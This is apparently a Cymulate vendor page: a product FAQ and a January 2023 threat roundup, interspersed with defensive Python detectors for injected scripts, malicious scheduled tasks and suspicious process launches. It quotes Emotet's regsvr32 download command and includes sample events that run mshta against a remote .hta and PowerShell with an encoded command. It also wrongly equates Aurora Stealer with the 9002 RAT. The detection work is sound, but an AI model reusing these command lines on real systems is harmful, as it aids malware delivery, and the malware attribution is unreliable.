Frequently Asked Questions

Cyber Threats & Attack Trends

What is the PolyVice ransomware and how does it operate?

PolyVice is a custom-branded ransomware payload used by the Vice Society group. It employs a hybrid encryption scheme combining NTRUEncrypt and ChaCha20-Poly1305 algorithms to securely encrypt files. In recent attacks, encrypted files are marked with the ".ViceSociety" extension, and a ransom note is placed in a file named "AllYFilesAE" in each directory. The codebase has been reused for other ransomware groups, indicating a "Malware-as-a-Service" model. (Source: SentinelOne)

How does Linux.BackDoor.WordPressExploit.1 & 2 target WordPress sites?

Linux.BackDoor.WordPressExploit.1 is a malicious program that exploits 30 vulnerabilities in WordPress plugins and themes to inject malicious JavaScript into webpages. It collects statistics on attacks and can inform remote servers about unpatched vulnerabilities. The newer variant, Linux.BackDoor.WordPressExploit.2, expands the list of exploited vulnerabilities and changes its command and control infrastructure. Both variants may include brute-force functionality for admin accounts in future versions. (Source: Doctor Web)

What is the YouTube Bot malware and what are its capabilities?

The YouTube Bot is a malicious program that can artificially boost YouTube content by automating views, likes, comments, and subscriptions. It also steals sensitive information such as cookies, login data, and passwords, and can download and execute additional malware. It uses Windows Scheduled Tasks for persistence and ensures only one instance runs at a time using a Mutex. (Source: Original Webpage)

How did attackers use Gootkit loader in the Australian healthcare sector?

Attackers targeted the Australian healthcare industry with the Gootkit loader malware, delivered via SEO poisoning. Victims searching for terms like "agreement" or "medical" could download the malware from compromised websites. The attack established persistence with scheduled tasks and used Cobalt Strike for command and control, enabling further reconnaissance and lateral movement. (Source: Original Webpage)

What is the Earth Bogle campaign and who was targeted?

Earth Bogle is a cyber-attack campaign targeting the Middle East and North Africa. Attackers used geopolitical lures to distribute njRAT malware, leveraging public cloud storage and compromised web servers. The initial infection vector was a malicious CAB file, followed by PowerShell scripts to inject njRAT into target systems. (Source: Trend Micro)

What is NeedleDropper malware and how is it distributed?

NeedleDropper is a dropper malware that stores and loads malicious payloads while hiding its execution with irrelevant data. It is distributed as a "Malware-as-a-Service" on hacking forums, allowing buyers to conceal their final payloads. (Source: Original Webpage)

How does DragonSpark attack organizations?

DragonSpark targets web servers and exposed MySQL databases, using tools like China Chopper webshell, SparkRAT, and other open-source malware. It employs encoding and encryption to evade detection and uses compromised infrastructure for command and control. SparkRAT supports Windows, Linux, and macOS, and can execute a wide range of commands. (Source: Original Webpage)

How are Microsoft OneNote attachments used in phishing attacks?

Phishing campaigns have used Microsoft OneNote attachments to deploy remote access trojans (RATs) such as AsyncRAT and XWorm. Attackers disguise emails as legitimate notifications and use VBS scripts embedded in OneNote files to download and execute malware, bypassing macro restrictions. (Source: BleepingComputer, Original Webpage)

What is APT41 ransomware and how was it used in attacks?

APT41 is a threat group that attempted to ransom a German financial institution by exploiting a vulnerable Microsoft Exchange Server with the ProxyLogon exploit. They used China Chopper webshell for persistence, performed credential dumping, and staged encryption attacks using Jetico’s BestCrypt and Microsoft Bitlocker. (Source: Medium)

How does IcedID malware spread and evade detection?

IcedID is a banking trojan that spreads via hijacked Google Pay-Per-Click ads, leading victims to download malicious DLL files. These DLLs act as loaders for the malware, using legitimate file names and modified functions to evade detection by security tools. (Source: Original Webpage)

What new techniques has Emotet used in recent attacks?

Emotet has added an SMB spreader module for lateral movement and a module to target Google Chrome for credit card theft. It uses Heaven's Gate injection to bypass security and has shifted from 32-bit to 64-bit binaries to evade detection. (Source: Original Webpage)

Who is the BlueBottle threat actor and what are their tactics?

BlueBottle (also known as Opera1er, Nxsms, Desktop-Group) targets the financial sector in French-speaking African countries. Their tactics include spear phishing, fake job lures, and malware delivery using tools like NanoCore RAT, Cybergate, Adwind, and Cobalt Strike. (Source: Original Webpage)

What is Aurora Stealer and what data does it target?

Aurora Stealer is a Golang-based information stealer advertised as Malware-as-a-Service. It collects system information, browser data, crypto wallets, and user directories, exfiltrating the data as a base64-encoded JSON file to a command and control server. (Source: Original Webpage)

How does Play Ransomware encrypt files?

Play Ransomware uses return-oriented programming to evade analysis and encrypts files with AES-GCM or AES-CBC, depending on file size. It avoids encrypting the Windows directory and targets network drives, using random buffers for encryption keys. (Source: Original Webpage)

What is the Vice Society group and what ransomware do they use?

The Vice Society group is a cybercriminal organization active since 2021, targeting sectors like manufacturing. They have used ransomware variants such as Hello Kitty, Five Hands, Zeppelin, and their own PolyVice. Their attacks often involve data theft and deletion of volume shadow copies to hinder recovery. (Source: Original Webpage)

How does Dharma ransomware operate and what are best practices for prevention?

Dharma ransomware encrypts files and demands payment for decryption, typically spreading via phishing, vulnerabilities, or exploit kits. It appends ".dharma" or ".wallet" to filenames and may use double extortion tactics. Prevention includes keeping software updated, practicing safe browsing, and maintaining backups. Experts advise against paying the ransom. (Source: Original Webpage)

Who is BlindEagle and what are their attack methods?

BlindEagle (APT-C-36) is a financially motivated group known for phishing campaigns in South America, especially Colombia and Ecuador. They use spear-phishing emails with compressed, password-protected files to deliver QuasarRAT and other malware, often targeting government and financial entities. (Source: Original Webpage)

What is the Turla APT group known for?

Turla (also known as Snake, VENOMOUS Bear, and others) is an advanced persistent threat group targeting government entities and embassies worldwide. They use malware like Andromeda, KopiLuwak, and QUIETCANARY for backdoors, reconnaissance, and data exfiltration, often employing encryption to evade detection. (Source: Original Webpage)

How does Gamaredon use Telegram in its attacks?

Gamaredon (ACTINIUM, DEV-0157, etc.) targets Ukrainian organizations and uses Telegram for command and control, victim profiling, and payload delivery. They employ spear-phishing documents and remote template injection vulnerabilities to bypass security and deliver malware. (Source: Original Webpage)

What is APT15 and what malware do they use?

APT15 (Vixen Panda, Ke3chang, etc.) is a sophisticated threat group conducting global cyber operations. Recently, they targeted Iranian telecommunications and diplomatic sectors using the Turian backdoor, which is protected with VMProtect and supports reverse shells and command execution. (Source: Original Webpage)

Cymulate Platform Features & Capabilities

What are the key capabilities of the Cymulate platform?

Cymulate offers continuous threat validation with 24/7 automated attack simulations, a unified platform combining Breach and Attack Simulation (BAS), Continuous Automated Red Teaming (CART), and Exposure Analytics. It features attack path discovery, automated mitigation, AI-powered optimization, complete kill chain coverage, and an extensive threat library with over 100,000 attack actions updated daily. (Source: Cymulate Platform)

How does Cymulate help organizations improve their security posture?

Cymulate enables organizations to proactively validate defenses, identify vulnerabilities, and optimize their security posture. Customers have reported up to a 52% reduction in critical exposures, a 60% increase in team efficiency, and an 81% reduction in cyber risk within four months. (Source: Hertz Israel Case Study)

Does Cymulate support integration with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, Cisco Secure Endpoint, CrowdStrike Falcon, Wiz, SentinelOne, and more. For a complete list, visit the Partnerships and Integrations page.

How easy is it to implement Cymulate and start using it?

Cymulate is designed for quick and easy implementation, operating in agentless mode with no need for additional hardware or complex configurations. Customers can start running simulations almost immediately, and comprehensive support is available via email, chat, and a knowledge base. (Source: Customer Testimonials, Cymulate Manual)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive, user-friendly interface and actionable insights. Testimonials highlight its ease of implementation, accessible support, and immediate value in identifying security gaps. (Source: Customer Quotes)

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the chosen package, number of assets, and scenarios selected. For a detailed quote, organizations can schedule a demo with the Cymulate team. (Source: Cymulate Manual)

What security and compliance certifications does Cymulate hold?

Cymulate holds several key certifications, including SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1. These certifications demonstrate compliance with industry-leading security and privacy standards. (Source: Security at Cymulate)

How does Cymulate ensure data security and privacy?

Cymulate ensures data security with encryption in transit (TLS 1.2+) and at rest (AES-256), secure AWS-hosted data centers, a robust disaster recovery plan, and a secure development lifecycle. The platform also includes 2FA, RBAC, IP restrictions, and GDPR compliance. (Source: Security at Cymulate)

What types of organizations and roles benefit from Cymulate?

Cymulate serves organizations of all sizes and industries, including finance, healthcare, retail, media, transportation, and manufacturing. Key roles include CISOs, Security Leaders, SecOps teams, Red Teams, and Vulnerability Management teams. (Source: CISO/CIO, SecOps, Red Teaming, Vulnerability Management)

How does Cymulate address common pain points in cybersecurity?

Cymulate addresses fragmented security tools, resource constraints, unclear risk prioritization, cloud complexity, communication barriers, inadequate threat simulation, operational inefficiencies, and post-breach recovery challenges through automation, integration, and actionable insights. (Source: Cymulate Manual)

How does Cymulate differ from other security validation platforms?

Cymulate stands out with its unified platform combining BAS, CART, and Exposure Analytics, continuous 24/7 validation, AI-powered optimization, full kill chain coverage, ease of use, and proven customer outcomes. It also offers the most advanced attack simulation library with daily updates. (Source: Cymulate vs Competitors)

What are some real-world use cases and case studies for Cymulate?

Examples include Hertz Israel reducing cyber risk by 81% in four months, a sustainable energy company scaling penetration testing, and Nemours Children's Health improving detection in hybrid environments. More case studies are available on the Cymulate Customers page.

How does Cymulate support different security personas?

Cymulate tailors solutions for CISOs (metrics and risk prioritization), SecOps (automation and efficiency), Red Teams (offensive testing with 100,000+ attack actions), and Vulnerability Management teams (in-house validation and prioritization). (Source: Cymulate Manual)

What is Cymulate's mission and vision?

Cymulate's mission is to transform cybersecurity by enabling organizations to proactively validate defenses, identify vulnerabilities, and optimize security posture. The vision is to create a collaborative environment for lasting improvements in cybersecurity strategies. (Source: About Us)

Where can I find Cymulate's blog, newsroom, and resource hub?

You can find the latest threats, research, and company news on the Cymulate Blog, Newsroom, and Resource Hub.

What topics are covered in the Cymulate blog?

The Cymulate blog covers cybersecurity threats, research findings, best practices, vulnerability management, lateral movement attacks, and more. Recent posts include analyses of Kerberos relay attacks, supply chain threats, and cloud threat detection. (Source: Cymulate Blog)

Does Cymulate provide educational resources like webinars and e-books?

Yes, Cymulate offers webinars, e-books, a knowledge base, and an AI chatbot for learning about security validation, best practices, and platform optimization. (Source: Cymulate Manual)

How often is Cymulate's SaaS platform updated?

Cymulate updates its SaaS platform every two weeks, adding new features such as AI-powered SIEM rule mapping and advanced exposure prioritization. (Source: About Us)

How can I contact Cymulate for support or a demo?

You can contact Cymulate for support via email at [email protected], through chat support, or by scheduling a demo on the Book a Demo page.


Cyber Threat Breakdown January 2023

By: Cymulate

Last Updated: June 23, 2025


Cyber attackers from all corners of the world, embracing all types and motivations, began 2023 with a wide variety of attacks. Here is a navigable summary of their main activity this January.

Table of Contents:

The Newcomers

The Comebacks

The Oldies

 

The Newcomers

Polyvice

Security experts have identified a new custom-branded ransomware payload used by the Vice Society group in recent intrusions. This new variant, named "PolyVice," features a robust hybrid encryption scheme that combines both asymmetric and symmetric encryption methods to securely encrypt files. The specific algorithms used in this payload are NTRUEncrypt and ChaCha20-Poly1305.

In recent attacks, the extension ".ViceSociety" was added to the encrypted file names, and the ransom note was placed in a file named "AllYFilesAE" in each encrypted directory. The codebase for the Windows payload has been reused to create custom-branded payloads for other threat groups, including "Chily" and "SunnyDay" ransomware. It is likely that an unknown developer or group of developers, specialized in ransomware development, is creating custom-branded payloads for multiple groups.

Vice Society group has also deployed third-party ransomware payloads in past intrusions, including HelloKitty, Five Hands, and Zeppelin.

Linux.BackDoor.WordPressExploit.1 & 2

Doctor Web, a cybersecurity firm, has discovered a malicious Linux program that hacks websites based on the WordPress CMS. The program, dubbed Linux.BackDoor.WordPressExploit.1, is able to exploit 30 vulnerabilities in a number of plugins and themes for the WordPress platform. If a website uses outdated versions of these add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScript. As a result, when users click on any area of an attacked page, they are redirected to other sites.

The trojan is able to perform various actions such as attacking a specified webpage, switching to standby mode, shutting itself down, and pausing logging its actions. The main functionality of the trojan is to hack websites based on the WordPress CMS and inject a malicious script into their webpages. To do so, it uses known vulnerabilities in WordPress plugins and website themes.

The trojan collects statistics on its work, including the overall number of websites attacked, every case of a vulnerability being exploited successfully, and the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox. In addition, it informs the remote server about all detected unpatched vulnerabilities.

A newer version of the trojan, Linux.BackDoor.WordPressExploit.2, has also been discovered. It differs from the original version by the C&C server address, the address of the domain from which the malicious JavaScript is downloaded, and also by an additional list of exploited vulnerabilities for various plugins.

Both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack, by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or that attackers plan to use it for future versions of this malware. This could potentially allow cybercriminals to successfully attack some websites that use current plugin versions with patched vulnerabilities.
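The symptom described above, a page that redirects on any click because of injected JavaScript, is something a site owner can check for without Doctor Web's tooling. The following is an added example written for this summary (not code from the report or from the trojan): it parses a fetched WordPress page, flags script tags loaded from hosts outside a per-site allowlist, and flags inline scripts that attach a document-wide click handler to a redirect. The allowlist, the redirect markers, and the sample page are assumptions constructed for illustration; real injected code varies and may be obfuscated, so treat this as a first-pass heuristic rather than a complete detector.

```python
"""Heuristic integrity check for a WordPress page: flags <script> tags loaded
from hosts outside a per-site allowlist and inline scripts that wire a
whole-document click handler to a redirect. Added example written for this
summary; it is not Doctor Web's tooling and the markers below are assumptions
about what injected redirect code tends to contain."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the site owner maintains this list of legitimate script hosts.
ALLOWED_SCRIPT_HOSTS = {"cdnjs.cloudflare.com", "www.google-analytics.com"}

# Assumed heuristic markers; real injected scripts vary and may be obfuscated.
REDIRECT_MARKERS = ("window.location", "location.href", "document.location")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (rule, detail) findings for one page's HTML."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname  # None for relative (same-origin) paths
        if host and host.lower() not in allowed_hosts:
            findings.append(("unlisted_script_host", src))
    for body in collector.inline:
        lowered = body.lower()
        if "click" in lowered and any(m in lowered for m in REDIRECT_MARKERS):
            findings.append(("click_redirect_handler", body.strip()[:80]))
    return findings


# Constructed sample page: one legitimate CDN script, one relative script,
# one script from an unlisted host, and an inline click-to-redirect handler.
SAMPLE_PAGE = """<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="/wp-includes/js/wp-embed.min.js"></script>
<script src="//static.unlisted-host.invalid/loader.js"></script>
</head><body>
<script>
document.addEventListener('click', function () {
  window.location = 'https://landing.unlisted-host.invalid/';
});
</script>
</body></html>"""

if __name__ == "__main__":
    for rule, detail in scan_page(SAMPLE_PAGE):
        print(rule, "->", detail)
```

Run it against the HTML a crawler fetches from each page of the site; relative script paths are treated as same-origin and skipped, so the allowlist only needs third-party hosts. Because the trojan's payload is served from a domain the attackers control, a host that is not on the allowlist is the higher-confidence signal; the click-handler heuristic is there to catch inline variants.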

YouTube Bot

A new malicious YouTube bot is capable of artificially boosting content on YouTube by viewing, liking, and commenting on videos, as well as subscribing to channels. It can also steal victims’ sensitive information, such as cookies, AutoFill, login data, and passwords. Upon receiving commands from a Command & Control server, it can download and execute additional malicious files.

The bot uses Windows Scheduled Tasks to establish persistence on the victims’ machine and uses a Mutex that starts with “sm” to ensure the malware is only running once.

South Korean Linux Servers Targeted

External-facing Linux servers located in South Korea were targeted by a sophisticated threat group utilizing a combination of tools, including a Shc (Shell Script Compiler) downloader, XMRig cryptocurrency miner, and a DDoS IRC botnet.

The attackers leveraged the XMRig miner to illicitly extract digital currency while also utilizing the botnet to perform various types of DDoS flood attacks, including TCP, UDP, and HTTP floods. Furthermore, the botnet was found to contain additional capabilities such as command execution, reverse shell, port scanning, and log deletion.

Unknown Info Stealer in Italy

In Italy, an unknown information stealer was delivered through an "Invoice" themed phishing campaign. The email contained a link to a malicious LNK file, which when clicked, downloaded a password-protected archive file containing a batch script and an additional LNK file. The LNK file, when executed, spawned a PowerShell command attempting to run a script file directly from a URL via the MSHTA binary. This led to the malware setting up persistence on the target machine and collecting crypto wallets, web browser data, and system information exfiltrated for later use.

Gootkit Loader SEO Attack Against Australian Healthcare

The Australian healthcare industry was targeted by a cyber-attack utilizing the Gootkit loader malware delivered through Search Engine Optimization (SEO) poisoning. The attackers used keywords such as "agreement", "health", "medical", and "enterprise agreement" to target victims, who upon visiting the compromised website, would download the malware.

The attack had two phases: the first phase established persistence via a scheduled task, while the second stage used the Cobalt Strike beacon for Command and Control (C2) communication.

The attackers also used additional malware for reconnaissance and outbound connections to machines on the internal network.
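Both the YouTube Bot and the Gootkit loader described above persist through Windows Scheduled Tasks, which makes exported task definitions a cheap place to hunt. The following is an added example for this summary (not code from any of the cited reports): it parses the XML that `schtasks /query /tn <name> /xml` prints and flags task actions that run from user-writable directories, that invoke a script interpreter, or that pass an encoded or remote payload to one. The directory markers, interpreter list, and sample task definitions are assumptions constructed for illustration; the XML schema and namespace are the real Task Scheduler ones.

```python
"""Audit exported Windows Task Scheduler XML for persistence patterns such as
those described above: task actions that run from user-writable directories
or hand a script interpreter remote or encoded input. Added example for this
summary, not code from any of the cited reports; the markers below are
assumptions. Input is the XML that `schtasks /query /tn <name> /xml` prints."""
import re
from xml.etree import ElementTree as ET

# Assumed markers of user-writable locations (matched case-insensitively).
USER_WRITABLE_MARKERS = (
    "\\appdata\\", "%appdata%", "%localappdata%", "%temp%", "\\temp\\",
    "\\programdata\\", "\\users\\public\\", "\\downloads\\",
)
# Script hosts and LOLBins that rarely belong in a legitimate task action.
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32")
REMOTE_OR_ENCODED = re.compile(r"https?://|-enc|-encodedcommand|frombase64string",
                               re.IGNORECASE)

_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def _local(tag):
    """Strip the XML namespace from a tag name."""
    return tag.rsplit("}", 1)[-1]


def audit_task_xml(task_xml):
    """Return a list of (rule, detail) findings for one task definition."""
    # schtasks emits a UTF-16 declaration; expat rejects that on str input, so drop it.
    text = _XML_DECL.sub("", task_xml, count=1)
    root = ET.fromstring(text)
    findings = []
    for exec_el in (e for e in root.iter() if _local(e.tag) == "Exec"):
        command = arguments = ""
        for child in exec_el:
            if _local(child.tag) == "Command":
                command = (child.text or "").strip()
            elif _local(child.tag) == "Arguments":
                arguments = (child.text or "").strip()
        lowered_cmd = command.lower()
        if any(m in lowered_cmd for m in USER_WRITABLE_MARKERS):
            findings.append(("user_writable_action", command))
        if any(i in lowered_cmd for i in INTERPRETERS):
            findings.append(("interpreter_action", f"{command} {arguments}".strip()))
            if REMOTE_OR_ENCODED.search(arguments):
                findings.append(("remote_or_encoded_arguments", arguments))
    return findings


def _task(command, arguments=""):
    """Build a minimal task definition in the real schema, for the samples below."""
    return f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec>
  </Actions>
</Task>"""


# Constructed samples: a vendor updater in Program Files and two persistence-style tasks.
BENIGN_TASK = _task(r"C:\Program Files\ExampleVendor\updater.exe", "/silent")
USER_DIR_TASK = _task(r"C:\Users\alice\AppData\Roaming\svc\update.exe")
# "QQBCAEMA" is just "ABC" in UTF-16LE base64, a harmless placeholder payload.
ENCODED_TASK = _task("powershell.exe", "-NoProfile -EncodedCommand QQBCAEMA")

if __name__ == "__main__":
    for name, xml_text in (("benign", BENIGN_TASK), ("user_dir", USER_DIR_TASK),
                           ("encoded", ENCODED_TASK)):
        print(name, audit_task_xml(xml_text))
```

To use it on a host, export every task (`schtasks /query /xml` without `/tn` prints all definitions concatenated, so split on the `<?xml` declarations first) and feed each definition to `audit_task_xml`. Tasks whose action lives under a user profile or that invoke an interpreter are not always malicious, but they are the ones worth an analyst's eyes.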

Earth Bogle

Labeled Earth Bogle by the Trend Micro researchers who discovered it, this cyber-attack campaign targeted the Middle East and North Africa; the attackers used Middle Eastern geopolitical lures to distribute njRAT malware.

The attackers utilized public cloud storage services to host the malware and employed compromised web servers to distribute the malicious remote access trojan. The attack's initial delivery mechanism involved a malicious CAB file, acting as the first stage loader, which was then followed by a PowerShell script injecting njRAT into the target system.

NeedleDropper

Avast's Threat Research Team has been monitoring a new strain of dropper malware referred to as "NeedleDropper." The name is derived from the way the malware stores data to be dropped into the victim's device.

The NeedleDropper contains multiple files used for both dropping and loading the malware, as well as for hiding its execution. To complicate analysis, the malware intermingles a large amount of irrelevant or unused data with the essential data for the malicious payload.

According to Avast's Threat Research Team, the developers behind NeedleDropper have adopted a "Malware-as-a-Service" business model and offer it for sale on hacking forums as a means for buyers to conceal their final payload.

DragonSpark

DragonSpark attacks target web servers and exposed MySQL database servers. The initial indicators of the attacks included use of the China Chopper webshell and a variety of malicious activities such as lateral movement, privilege escalation, and deployment of malware and tools hosted on attacker-controlled infrastructure.

The threat actor relies heavily on open-source tools developed by Chinese developers or vendors, including SparkRAT, SharpToken, BadPotato, GotoHTTP, ShellCode_Loader and m6699.exe. SparkRAT is a RAT developed in Golang and supports Windows, Linux, and macOS operating systems.

It uses the WebSocket protocol to communicate with the C2 server and has an upgrade system to update itself to the latest version. The version of SparkRAT observed had 26 commands that allow for command execution, system manipulation, file and process manipulation, and information theft. The Golang malware m6699.exe uses the Yaegi framework to execute encoded Golang source code, hindering static analysis and evading detection. It establishes a Meterpreter session for remote command execution. The PyInstaller-packaged malware ShellCode_Loader, implemented in Python, serves as the loader of a reverse shell.

The malware uses encoding and encryption to hinder static analysis. The malware infrastructure includes compromised infrastructure of Taiwanese organizations and businesses and an Amazon Cloud EC2 instance.

Microsoft OneNote

BleepingComputer reports a phishing campaign using Microsoft OneNote attachments that aim to deploy remote access trojans (RATs) for malicious purposes such as stealing passwords and cryptocurrency. Threat actors are disguising the emails as DHL shipping notifications, invoices, and other forms and documents.

The attackers are exploiting OneNote, which does not support macros, by embedding malicious VBS attachments. When a user opens the attachment, OneNote displays a warning; if the user proceeds, the VBS script is executed and downloads and runs malware.

BleepingComputer has observed the installation of AsyncRAT and XWorm RATs from malspam emails using this attack technique.

The Comebacks

APT41 Ransomware

APT41 unsuccessfully attempts to ransom a German financial institution

During the incident response engagement, the Data Incident Response Team (DIRT) performed a forensic analysis of multiple servers and workstations, determining that:

  • The initial attack vector was a vulnerable “Microsoft Exchange Server”, that was compromised with the help of the ”ProxyLogon” exploit.
  • The threat actor used a “China Chopper” web shell to persist on the compromised “Microsoft Exchange Server”.
  • The threat actor laterally moved from the patient zero to a domain controller after performing initial credential dumping activities.
  • The threat actor used a second domain controller as a “base” to stage his encryption attack against workstations and servers in the environment.
  • The threat actor used “Jetico’s BestCrypt” for server encryption and “Microsoft Bitlocker” for the encryption of workstations.
  • The threat actor accessed compromised systems through RDP by exposing the RDP port to the internet with the help of “NATBypass”.

IceID Malware

The banking trojan IcedID hijacked Google PPC ads.

The attackers have been leveraging Google Pay-Per-Click (PPC) ads to distribute modified Dynamic Link Library (DLL) files, which act as a loader for the IcedID malware.

Upon searching for a popular keyword, victims may be directed to fake installers through hijacked ads, leading to downloads that mimic the intended search term. Once downloaded and executed, the modified DLL invokes the “init” export function to initiate the loader routine.

This method of using legitimate DLLs and modifying their functions to execute malicious tasks is a tactic used to evade detection from machine learning and whitelisting technologies. It also demonstrates the attackers’ ability to adapt to security detection strategies.

Emotet poses as IRS

A phishing campaign impersonating the United States Internal Revenue Service (IRS) was conducted by the Emotet group using a compromised email account in Pakistan.

The phishing email appears to be from the United States IRS and includes two attachments with the subject "IRS Tax Forms K-1". The attachments are password-protected; when unpacked, the file copies itself into the "Templates" directory and later relaunches from there.

The attachments contain a malicious Excel 4.0 macro that executes within an unprotected workbook. The macro contains a URL fragment used to download additional payloads. The Emotet payload is downloaded via regsvr32.exe using the command "%WINDIR%\System32\regsvr32.exe /S ..\oxnv[n].ooccxx".

Emotet is a DLL file that utilizes anti-analysis and debugging methods, and it has over 270 export functions. Once Emotet is running on the victim's machine, it attempts to contact command and control (C2) server nodes in order to receive further instructions and deliver stolen information.
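Three of the chains in this roundup end in the same kind of process-creation event: the Italian "Invoice" stealer has PowerShell run MSHTA against a remote script, the OneNote campaign has an Office application launch a VBS host, and this Emotet campaign has an Excel macro hand regsvr32.exe a relative path with a non-library extension. The following is an added example for this summary (not code from the cited reports): detection logic over Sysmon-style process-creation events that covers those three patterns with a parent/child rule, a regsvr32 target-file rule, and an mshta URL rule. The event field names, paths, and file names are constructed for the example.

```python
"""Detection logic for the process-creation patterns that recur in this
summary: an Office application spawning a script host, regsvr32.exe silently
loading a file that is not a library (or a relative-path file), and mshta.exe
handed a URL. Added example for this summary, not code from the cited reports.
Events are Sysmon-style dicts (Image, ParentImage, CommandLine); the field
names and sample values are constructed here."""
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "onenote.exe", "outlook.exe"}
SCRIPT_HOSTS = {"regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "rundll32.exe", "cmd.exe"}
LIBRARY_EXTS = {".dll", ".ocx", ".ax"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def _split_cmdline(cmdline):
    """Minimal Windows command-line tokenizer: honours double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def analyze_event(event):
    """Return the list of rule names that fire for one process-creation event."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmdline = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if image == "regsvr32.exe":
        # Everything after the program name that is not a switch is a file target.
        targets = [t for t in _split_cmdline(cmdline)[1:] if not t.startswith(("/", "-"))]
        for target in targets:
            if ntpath.splitext(target)[1].lower() not in LIBRARY_EXTS:
                hits.append("regsvr32_nonstandard_extension")
            if "..\\" in target:
                hits.append("regsvr32_relative_path")
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_content")
    return hits


def scan_events(events):
    """Map event index -> rule names, for events that triggered at least one rule."""
    results = {}
    for idx, event in enumerate(events):
        hits = analyze_event(event)
        if hits:
            results[idx] = hits
    return results


# Constructed sample telemetry (paths and file names are invented for the example).
SAMPLE_EVENTS = [
    {   # Excel macro handing regsvr32 a relative file with an unusual extension
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'"%WINDIR%\System32\regsvr32.exe" /S ..\oxnv1.ooccxx',
    },
    {   # PowerShell launching mshta against a remote script
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe https://stage.invalid/second.hta",
    },
    {   # Installer registering a real COM library: no rule should fire
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll",
    },
    {   # OneNote attachment launching a VBS host
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\OneNote\invoice.vbs"',
    },
]

if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", ", ".join(hits))
```

The benign msiexec event is in the sample deliberately: regsvr32 registering a real .dll from System32 is routine, and the rules key on what is unusual about the Emotet invocation (a relative path and a made-up extension) rather than on regsvr32 itself. Feed the function real Sysmon Event ID 1 records mapped to the same three fields to use it at scale.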

Emotet, again!

Recently, Emotet has added an SMB spreader module for lateral movement and a module to target a victim's Google Chrome browser to steal credit card information. To load its modules, Emotet uses the Heaven's Gate injection technique to bypass security measures. The latest wave of Emotet spam emails has a new method to trick users into downloading the dropper, and Emotet variants have moved from 32-bit to 64-bit to evade detection.

BlueBottle

BlueBottle (AKA Opera1er, Nxsms, Desktop-Group) is a threat actor targeting the financial sector in French-speaking countries in Africa.

Their latest phishing attacks combine spear-phishing emails with fake job-opportunity lures to deliver malware such as NanoCore RAT, Cybergate, Adwind, WSH-RAT, and Houdini.

Their known operational methods include using Netwire, Quasar RATs, Cobalt Strike, GuLoader, Mimikatz, and multiple Microsoft Windows command-line utilities.

Aurora Stealer

A recent threat actor was uncovered utilizing tactics such as mimicking legitimate websites to host and deliver the 9002 RAT, also known as Aurora Stealer, Hydraq, and McRat. The malware employed techniques such as binary padding, system checks, and obfuscation in an attempt to evade detection from antivirus software.

Aurora Stealer, first advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, is a Golang-based information stealer with downloading and remote access capabilities. The malware targets diverse types of data, including system information, data from web browsers, crypto wallets, and specific user directories.

During execution, the malware collects basic host information through the execution of various WMIC commands, captures a screenshot, and exfiltrates the stolen data to a C2 server in the form of a single base64-encoded JSON file.

Play Ransomware

